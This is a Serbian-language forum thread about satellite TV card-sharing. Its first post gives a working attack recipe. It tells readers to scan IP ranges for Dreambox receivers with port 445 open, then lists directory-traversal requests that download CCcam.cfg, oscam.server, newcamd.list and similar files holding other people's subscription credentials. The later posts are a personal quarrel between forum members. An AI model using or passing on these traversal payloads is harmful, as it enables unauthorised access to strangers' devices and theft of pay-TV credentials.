Satelitska TV i kljucevi

LEGEND
Učlanjen(a)
18.06.2009
Poruka
2.431
Potreban je Network IP Scanner. Mada je sve teze pronaci DM-ove, jer uslov je otvoren port 445 na koji atakuje ovaj skener.
Kod:
http://www.mylanviewer.com/net-ip-scanner.html
Ip rangovi ovde
Kod:
http://software77.net/geo-ip/

Ove komande iza ip adrese. Prva komanda skida fajl gde s nalazi C-linija
/file?file=../../../../../../../../../../../../../var/etc/CCcam.cfg
/file?file=../../../../../../../../../../../../../var/etc/CCcam.providers
/file?file=../../../../../../../../../../../../../bouqueteditor/tmp/bouquets_backup.tar
/file?file=../../../../../../../../../../../../../var/keys/newcamd.list
/file?file=../../../../../../../../../../../../../etc/tuxbox/config/oscam.server
/file?file=../../../../../../../../../../../../../etc/enigma2/userbouquet.favourites.tv
/file?file=../../../../../../../../../../../../../etc/tuxbox/config/oscam.server
/file?file=../../../../../../../../../../../../../etc/enigma2/bouquets.tv

500.png

500.png

Učlanjen(a)
01.05.2011
Poruka
303
Burmann, ti mrziš , kako kažeš "lenje ljude" iako mi nije jasno po čemu si to zaključio ... ali još više VOLIŠ da provociraš ljude.. zadrži svoju mudrost za sebe kad već nemaš nameru da pomažeš.
Ima ljudi koji su spremni pomoći u svakom trenutku ako to znaju i mogu, ima i onih koji mogu i neće - ali bar ćute. a ti malo razmisli o svom ponašanju iako sam DO DANAS imao sasvim drugačije mišljenje o tebi. Nek ti je sa srećom!

Član
Učlanjen(a)
28.11.2009
Poruka
7.686
Burmann, ti mrziš , kako kažeš "lenje ljude" iako mi nije jasno po čemu si to zaključio ... ali još više VOLIŠ da provociraš ljude.. zadrži svoju mudrost za sebe kad već nemaš nameru da pomažeš.
Ima ljudi koji su spremni pomoći u svakom trenutku ako to znaju i mogu, ima i onih koji mogu i neće - ali bar ćute. a ti malo razmisli o svom ponašanju iako sam DO DANAS imao sasvim drugačije mišljenje o tebi. Nek ti je sa srećom!
Lenji ljudi su (po meni) oni ljudi, kojima je tesko da barem pokusaju npr. pronaci nesto na forumu (U/P Skeneri i kako skenirati) gde im je vec objasnjeno to sto traze !
Licno ti, ocekujes od mene da ti nesto objasnim, a u startu nase konverzacije me omalovazavas ! (pogledaj tvoje prvo obracanje meni)
Pominjes moje ponasanje, i zakljucujem da bih (po tebi) bio "dobar", da sam ti odmah sve dao i pokazao !
Razmisli ti malo o svom ponasanju, i neka ti je sa srecom ! ;)

Natrag